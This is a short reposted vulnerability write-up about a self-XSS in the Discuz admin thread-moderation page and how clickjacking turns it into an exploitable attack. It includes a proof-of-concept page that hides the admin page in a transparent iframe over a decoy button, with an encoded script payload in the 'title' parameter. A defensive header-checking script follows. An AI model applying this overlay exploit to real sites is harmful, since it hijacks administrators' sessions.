Source: 自学PHP网  Date: 2015-04-15 15:00
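Self XSS + Click Jacking ==> Stored XSS
http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads: this page contains a hidden form field "title" that can be submitted via GET; the payload fires after the administrator clicks "Submit".
Because this is a Self XSS, it is hard to exploit on its own. The Discuz admin backend, however, can be embedded through an iframe tag, so the Self XSS can be combined with Click Jacking to make it exploitable.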
<html>
<head>
<title>Dz XSS Demo</title>
<style type="text/css">
/* Decoy button that the administrator sees */
#click{
    height: 25px;
    width: 60px;
    top: 710px;
    left: 220px;
    position: absolute;
    z-index: 1;
}
/* Fully transparent iframe stacked above the decoy button */
#hidden{
    height: 500px;
    width: 500px;
    top: 320px;
    left: 45px;
    filter: alpha(opacity=0);
    opacity: 0;
    position: absolute;
    z-index: 2
}
</style>
</head>
<body>
<img src="girl.jpg">
<button id="click">下一页</button>
<!-- Admin page loaded with the "title" parameter pre-filled -->
<iframe id="hidden" src="http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads&title=%26%23x27%26%23x29%26%23x22%26%23x29%26%23x3b%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e%26%23x29%26%23x3b%26%23x2f%26%23x2f"></iframe>
</body>
</html>
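The demo above only works because the admin page can be rendered inside a cross-origin iframe. The following check is an added example, not code from the original post or from Discuz: it classifies a response's framing policy from its `X-Frame-Options` and CSP `frame-ancestors` headers. The function names, verdict labels and sample headers are assumptions constructed for illustration.

```javascript
// Added example (not from the original post). Classifies whether a response
// may be rendered inside a cross-origin <iframe>, from its headers alone.
// Assumes one enforced CSP policy per response (Report-Only is not enforced).

function header(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? null : String(headers[key]);
}

// Source list of the CSP frame-ancestors directive, or null when absent.
function frameAncestors(csp) {
  for (const directive of (csp || '').split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources.map((s) => s.toLowerCase());
  }
  return null;
}

function framingVerdict(headers) {
  const fa = frameAncestors(header(headers, 'content-security-policy'));
  if (fa !== null) {
    // When present, frame-ancestors is enforced instead of X-Frame-Options.
    if (fa.length === 0 || fa.every((s) => s === "'none'")) return 'blocked';
    if (fa.every((s) => s === "'self'")) return 'same-origin-only';
    if (fa.some((s) => s === '*' || /^https?:$/.test(s))) return 'frameable';
    return 'allow-listed';
  }
  const xfo = header(headers, 'x-frame-options');
  if (xfo === null) return 'frameable';
  const values = new Set(xfo.split(',').map((v) => v.trim().toLowerCase()));
  const known = ['deny', 'sameorigin', 'allowall'].some((v) => values.has(v));
  if (values.size > 1) return known ? 'blocked' : 'frameable'; // conflicting values fail closed
  if (values.has('deny')) return 'blocked';
  if (values.has('sameorigin')) return 'same-origin-only';
  return 'frameable'; // ALLOW-FROM and unknown values are ignored by current browsers
}

// Constructed sample responses for an admin page such as admin.php.
const SAMPLES = {
  unprotected: { 'Content-Type': 'text/html' },
  legacyOnly: { 'X-Frame-Options': 'ALLOW-FROM https://portal.example' },
  hardened: {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'",
  },
};

for (const [n, h] of Object.entries(SAMPLES)) console.log(n, '=>', framingVerdict(h));
```

A verdict of `frameable` on an authenticated admin page means the overlay technique shown above is possible against it; framing protection does not remove the underlying XSS in the `title` parameter, which still needs output encoding.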